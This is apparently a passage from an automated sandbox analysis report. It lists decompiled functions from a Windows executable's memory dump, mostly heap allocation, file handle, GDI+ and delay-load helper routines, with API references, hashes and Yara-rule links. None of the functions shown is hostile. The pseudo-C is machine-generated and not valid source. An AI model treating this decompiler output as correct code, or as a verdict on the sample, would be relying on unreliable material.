          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: H_prolog
          • String ID:
          • API String ID: 3519838083-0
          • Opcode ID: 4eb9320abbab578376069b83fa057cc6f69ed33ded502907af98137ec47174bc
          • Instruction ID: 81510658eb5010188b5ef6492634148763e9c80056a3dd85c567bf5c5343aa0f
          • Opcode Fuzzy Hash: 4eb9320abbab578376069b83fa057cc6f69ed33ded502907af98137ec47174bc
          • Instruction Fuzzy Hash: 61018170929658DAD715EBA4C1057FEB7A89F25310F00459DE54E53382CBF82B05C763
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00217A8A, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
          Download Yara Rule
          C-Code - Quality: 94%
          			E00217A8A(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00217ECC())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x250874, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00217906();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00216763(_t7, _t8, _t9, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}









          0x00217a8a
          0x00217a90
          0x00217a96
          0x00217ac8
          0x00217acd
          0x00217ad3
          0x00000000
          0x00217ad3
          0x00217a9a
          0x00217a9c
          0x00217a9c
          0x00217ab3
          0x00217abc
          0x00217ac4
          0x00000000
          0x00000000
          0x00217aa4
          0x00217aa6
          0x00000000
          0x00000000
          0x00217aa9
          0x00217aae
          0x00217aaf
          0x00217ab1
          0x00000000
          0x00000000
          0x00217ab1
          0x00000000

          APIs
          • RtlAllocateHeap.NTDLL(00000000,?,?,?,00212FA6,?,0000015D,?,?,?,?,00214482,000000FF,00000000,?,?), ref: 00217ABC
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AllocateHeap
          • String ID:
          • API String ID: 1279760036-0
          • Opcode ID: bb5339819c613e1a80c766ed3af7edfbc9797983b5a6614aefedf52df3c08566
          • Instruction ID: 83e49b567c0d70939f2b972ca6e49d9529f9715123cb9dbd277fc664f3481b63
          • Opcode Fuzzy Hash: bb5339819c613e1a80c766ed3af7edfbc9797983b5a6614aefedf52df3c08566
          • Instruction Fuzzy Hash: 06E0E52117822776E6312A619D04BDE3AECEFF13B1F190120EC14960D0CF61CEF086E1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F94DA, Relevance: 1.5, APIs: 1, Instructions: 30COMMON
          Download Yara Rule
          C-Code - Quality: 89%
          			E001F94DA(void* __ecx) {
				void* _t16;
				void* _t21;

				_t21 = __ecx;
				_t16 = 1;
				if( *(__ecx + 4) != 0xffffffff) {
					if( *((char*)(__ecx + 0x10)) == 0 &&  *((intOrPtr*)(__ecx + 0xc)) == 0) {
						_t5 = FindCloseChangeNotification( *(__ecx + 4)) - 1; // -1
						asm("sbb bl, bl");
						_t16 =  ~_t5 + 1;
					}
					 *(_t21 + 4) =  *(_t21 + 4) | 0xffffffff;
				}
				 *(_t21 + 0xc) =  *(_t21 + 0xc) & 0x00000000;
				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x14)) != _t16) {
					E001F6C7B(0x2300e0, _t21 + 0x1e);
				}
				return _t16;
			}





          0x001f94dc
          0x001f94de
          0x001f94e4
          0x001f94ea
          0x001f94fb
          0x001f9500
          0x001f9502
          0x001f9502
          0x001f9504
          0x001f9504
          0x001f9508
          0x001f950e
          0x001f951e
          0x001f951e
          0x001f9527

          APIs
          • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,001F94AA), ref: 001F94F5
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ChangeCloseFindNotification
          • String ID:
          • API String ID: 2591292051-0
          • Opcode ID: 17a03d07a749ab2afcfd36c859dbbcd1505b45a1802ce85f403228382b4a0a8b
          • Instruction ID: c82b24a9c32be397e1a29cae566dd4a373b74c4caee1bc5f67fc9af8d70c50fc
          • Opcode Fuzzy Hash: 17a03d07a749ab2afcfd36c859dbbcd1505b45a1802ce85f403228382b4a0a8b
          • Instruction Fuzzy Hash: 67F0E2B0442B099EDB319A24C5487A2B3E89B12B30F048B5FD2EB434F0D331684DCB10
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001FA1B1, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
          Download Yara Rule
          APIs
          • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 001FA1E0
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CloseFind
          • String ID:
          • API String ID: 1863332320-0
          • Opcode ID: fb7c6d8b94cdb7d669e3cc53aa8deca1af13c15945100b973953d0e1a55b1c79
          • Instruction ID: b640cea67d25b5e59398d25dfe6a0f21d2c423369f7310ced0572a260a4a66a2
          • Opcode Fuzzy Hash: fb7c6d8b94cdb7d669e3cc53aa8deca1af13c15945100b973953d0e1a55b1c79
          • Instruction Fuzzy Hash: 2EF08275008794AACB226BB49804BE7BB916F26331F048A4DF2FD12192C77A5099D722
          Uniqueness

          Uniqueness Score: -1.00%

          Function 002002E8, Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
          Download Yara Rule
          C-Code - Quality: 75%
          			E002002E8() {
				void* __esi;
				void* _t2;

				E00200FAF(); // executed
				_t2 = E00200FB4();
				if(_t2 != 0) {
					_t2 = E001F6CC9(_t2, 0x2300e0, 0xff, 0xff);
				}
				if( *0x2300eb != 0) {
					_t2 = E001F6CC9(_t2, 0x2300e0, 0xff, 0xff);
				}
				__imp__SetThreadExecutionState(1);
				return _t2;
			}





          0x002002ea
          0x002002ef
          0x00200300
          0x00200305
          0x00200305
          0x00200311
          0x00200316
          0x00200316
          0x0020031d
          0x00200325

          APIs
          • SetThreadExecutionState.KERNEL32 ref: 0020031D
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ExecutionStateThread
          • String ID:
          • API String ID: 2211380416-0
          • Opcode ID: 88a20d890381233d37669d1e6921345f61a3736d5cc3b99dddbf7d6b52a3cd54
          • Instruction ID: 57524b524430baa7d9bba83efef0e74d4896b4e8bb0b2ed2de62330e094303c1
          • Opcode Fuzzy Hash: 88a20d890381233d37669d1e6921345f61a3736d5cc3b99dddbf7d6b52a3cd54
          • Instruction Fuzzy Hash: D3D02B1063179122FB36372439ED7FE06064FD2B10F080069B185363C78F450C9AD2B2
          Uniqueness

          Uniqueness Score: -1.00%

          Function 002095CF, Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
          Download Yara Rule
          C-Code - Quality: 68%
          			E002095CF(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t6;

				_push(__ecx);
				_push(0x10);
				L0020D7F6();
				_v8 = __eax;
				if(__eax == 0) {
					return 0;
				}
				_t6 = E0020938E(__eax, _a4, _a8); // executed
				return _t6;
			}





          0x002095d2
          0x002095d3
          0x002095d5
          0x002095da
          0x002095df
          0x00000000
          0x002095f0
          0x002095e9
          0x00000000

          APIs
          • GdipAlloc.GDIPLUS(00000010), ref: 002095D5
            • Part of subcall function 0020938E: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 002093AF
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Gdip$AllocBitmapCreateFromStream
          • String ID:
          • API String ID: 1915507550-0
          • Opcode ID: c2a80f1359858ca97af3cccb572868f2337aa7eea0f8eb62410b7628bddc2cae
          • Instruction ID: 2dff6bea963930a08100b1012fdfac0572734da21bc9b925ead2df5409df0f49
          • Opcode Fuzzy Hash: c2a80f1359858ca97af3cccb572868f2337aa7eea0f8eb62410b7628bddc2cae
          • Instruction Fuzzy Hash: 41D05E302243096BDB51AB758C12A6ABA98DB00310F004065BC06851D3F971D970AA91
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F9745, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E001F9745(void* __ecx) {
				long _t3;

				if( *(__ecx + 4) != 0xffffffff) {
					_t3 = GetFileType( *(__ecx + 4)); // executed
					if(_t3 == 2 || _t3 == 3) {
						return 1;
					} else {
						return 0;
					}
				} else {
					return 0;
				}
			}




          0x001f9749
          0x001f9751
          0x001f975a
          0x001f9767
          0x001f9761
          0x001f9763
          0x001f9763
          0x001f974b
          0x001f974d
          0x001f974d

          APIs
          • GetFileType.KERNELBASE(000000FF,001F9683), ref: 001F9751
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: FileType
          • String ID:
          • API String ID: 3081899298-0
          • Opcode ID: ac7a45392af2c7c22291f0f624814be6a485072529891cfdbf3970284bb98fc1
          • Instruction ID: 39e1459730ce0699b64b42acc2c0af5e6d7a1834ab813ece34ea53e0328d1311
          • Opcode Fuzzy Hash: ac7a45392af2c7c22291f0f624814be6a485072529891cfdbf3970284bb98fc1
          • Instruction Fuzzy Hash: A5D01270031304E58F313E385E0917576559F83366738C7A4D125C80B1C722C843F940
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020C9FE, Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E0020C9FE(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				void* _t7;

				SendDlgItemMessageW( *0x2375c8, 0x6a, 0x402, E001FF749(_a20, _a24, _a28, _a32), 0); // executed
				_t7 = E0020A388(); // executed
				return _t7;
			}




          0x0020ca23
          0x0020ca29
          0x0020ca2e

          APIs
          • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0020CA23
            • Part of subcall function 0020A388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0020A399
            • Part of subcall function 0020A388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0020A3AA
            • Part of subcall function 0020A388: IsDialogMessageW.USER32(000F004A,?), ref: 0020A3BE
            • Part of subcall function 0020A388: TranslateMessage.USER32(?), ref: 0020A3CC
            • Part of subcall function 0020A388: DispatchMessageW.USER32(?), ref: 0020A3D6
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Message$DialogDispatchItemPeekSendTranslate
          • String ID:
          • API String ID: 897784432-0
          • Opcode ID: 540cf920a8af874801b0719b3db689cfbfd59e7df2b24ddfff74401cd099258f
          • Instruction ID: ab1d533c2f2be0ebd312bf8dc7a2b91e8f6848349d4c1135c3b05030145c4e32
          • Opcode Fuzzy Hash: 540cf920a8af874801b0719b3db689cfbfd59e7df2b24ddfff74401cd099258f
          • Instruction Fuzzy Hash: B2D09E75154300BADB112B51DE0AF1A7AB2AF9CB04F404554B345740F186629D31AF16
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020D1A4, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
          Download Yara Rule
          C-Code - Quality: 58%
          			E0020D1A4() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0020D53A(_t3, _t4, _t8, _t9, _t10, 0x22ab6c, 0x22df08); // executed
				goto __eax;
			}








          0x0020d1ae
          0x0020d1b6
          0x0020d1bd

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D1B6
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          • Opcode ID: c46464f6273d7abd7652a25d110b26f52eec5ed38d5d8594f8d0109dcd96d778
          • Instruction ID: 18717769a24745e08fa9cc0f3a5e0e63609ee6912cabe86b2c609e78bfec07ad
          • Opcode Fuzzy Hash: c46464f6273d7abd7652a25d110b26f52eec5ed38d5d8594f8d0109dcd96d778
          • Instruction Fuzzy Hash: B5B012A13BA310BE730431C8FE02C36020DC2D1F1A3B0811AF445C04C698804C700036
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020D1BF, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
          Download Yara Rule
          C-Code - Quality: 58%
          			E0020D1BF() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0020D53A(_t3, _t4, _t8, _t9, _t10, 0x22ab6c, 0x22df10); // executed
				goto __eax;
			}








          0x0020d1ae
          0x0020d1b6
          0x0020d1bd

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D1B6
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          • Opcode ID: 0c51b5cfdb34aebf3164a3088f7f50432b49fc7402c1ff15464deaf48da9c119
          • Instruction ID: 58b69bff6393580610b875eaa67839f5e8791aca662893d85b1c48be8a563751
          • Opcode Fuzzy Hash: 0c51b5cfdb34aebf3164a3088f7f50432b49fc7402c1ff15464deaf48da9c119
          • Instruction Fuzzy Hash: 85B012A137A210BE730461CC7D02C36020CD1C1F19370841AF409C08CAD8808C300036
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020D1C9, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
          Download Yara Rule
          C-Code - Quality: 58%
          			E0020D1C9() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0020D53A(_t3, _t4, _t8, _t9, _t10, 0x22ab6c, 0x22df0c); // executed
				goto __eax;
			}








          0x0020d1ae
          0x0020d1b6
          0x0020d1bd

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D1B6
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          • Opcode ID: 3f509349bf2bb7a7872a00940391c27c1518f609557a7d2d4b7188de78c13888
          • Instruction ID: 27379114f042b75b59dca5f674a05dce8e7993d6e2ee3f039fc5c46313e0ce30
          • Opcode Fuzzy Hash: 3f509349bf2bb7a7872a00940391c27c1518f609557a7d2d4b7188de78c13888
          • Instruction Fuzzy Hash: 64B012A137A210BE730461CC7D02C36031CC1D1F1A3B0C01AF809C14C6D8804C340036
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020D1DD, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
          Download Yara Rule
          C-Code - Quality: 58%
          			E0020D1DD() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0020D53A(_t3, _t4, _t8, _t9, _t10, 0x22ab6c, 0x22df04); // executed
				goto __eax;
			}








          0x0020d1ae
          0x0020d1b6
          0x0020d1bd

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D1B6
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          • Opcode ID: 38558f65b140cd7281db62088dad09f7a3d0d9632d2a1d12e02885ba1f7af9ad
          • Instruction ID: dd44a27ca57db9df107f0c56d54c4177e236351963bd4ac1b7eab970b8c3aaa3
          • Opcode Fuzzy Hash: 38558f65b140cd7281db62088dad09f7a3d0d9632d2a1d12e02885ba1f7af9ad
          • Instruction Fuzzy Hash: BBB012A137A210BE730461CC7E02C36020CC1D1F1A3B0801AF409C14C6D8814C310036
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020D234, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
          Download Yara Rule
          C-Code - Quality: 58%
          			E0020D234() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0020D53A(_t3, _t4, _t8, _t9, _t10, 0x22ab8c, 0x22dffc); // executed
				goto __eax;
			}








          0x0020d20f
          0x0020d217
          0x0020d21e

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D217
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          • Opcode ID: b7b2757360d90e119096e9b0368da691921e196b1af06d43fc8dbc9fee89cee7
          • Instruction ID: 127052b656137d930be63cd70d49e5197b003d8651e446af494152fe68b39678
          • Opcode Fuzzy Hash: b7b2757360d90e119096e9b0368da691921e196b1af06d43fc8dbc9fee89cee7
          • Instruction Fuzzy Hash: C0B012D52BB220BE730451C87E42D36070CD5D1B2D3B0C01AFC05C18C7D8808C300032
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020D23E, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
          Download Yara Rule
          C-Code - Quality: 58%
          			E0020D23E() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0020D53A(_t3, _t4, _t8, _t9, _t10, 0x22ab8c, 0x22dff0); // executed
				goto __eax;
			}








          0x0020d20f
          0x0020d217
          0x0020d21e

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D217
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          • Opcode ID: bd4ac875bb8a0ee4b86bd8bea5d6bb8bf181e95c9b7a4fe21069fabd83d7ea0a
          • Instruction ID: d7b443a907c07264e506e2c686a7a7f4d3d073c53c93a0204b8e131d4ec84e0e
          • Opcode Fuzzy Hash: bd4ac875bb8a0ee4b86bd8bea5d6bb8bf181e95c9b7a4fe21069fabd83d7ea0a
          • Instruction Fuzzy Hash: D8B012D52BB210BE730451C87E02E36070CE5E1B2D3B0801AF805C18CBD8808C300032
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020D205, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
          Download Yara Rule
          C-Code - Quality: 58%
          			E0020D205() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0020D53A(_t3, _t4, _t8, _t9, _t10, 0x22ab8c, 0x22dff8); // executed
				goto __eax;
			}








          0x0020d20f
          0x0020d217
          0x0020d21e

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D217
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          • Opcode ID: 53f0accf1a3a9c339ff4f24646b8b72ad16cd099c1184e97047295b09db0d538
          • Instruction ID: 983df6f21cf7aa554aee85dab6f744ed80a6f7f1497ff3ccb67cb631ade61be0
          • Opcode Fuzzy Hash: 53f0accf1a3a9c339ff4f24646b8b72ad16cd099c1184e97047295b09db0d538
          • Instruction Fuzzy Hash: 82B012D52BB310BE730411C47E02C36070CD6D1F2D3B0811AF811C04CB98808C700032
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020D7DA, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
          Download Yara Rule
          C-Code - Quality: 58%
          			E0020D7DA() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0020D53A(_t3, _t4, _t8, _t9, _t10, 0x22abcc, 0x22deb4); // executed
				goto __eax;
			}








          0x0020d7e4
          0x0020d7ec
          0x0020d7f3

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D7EC
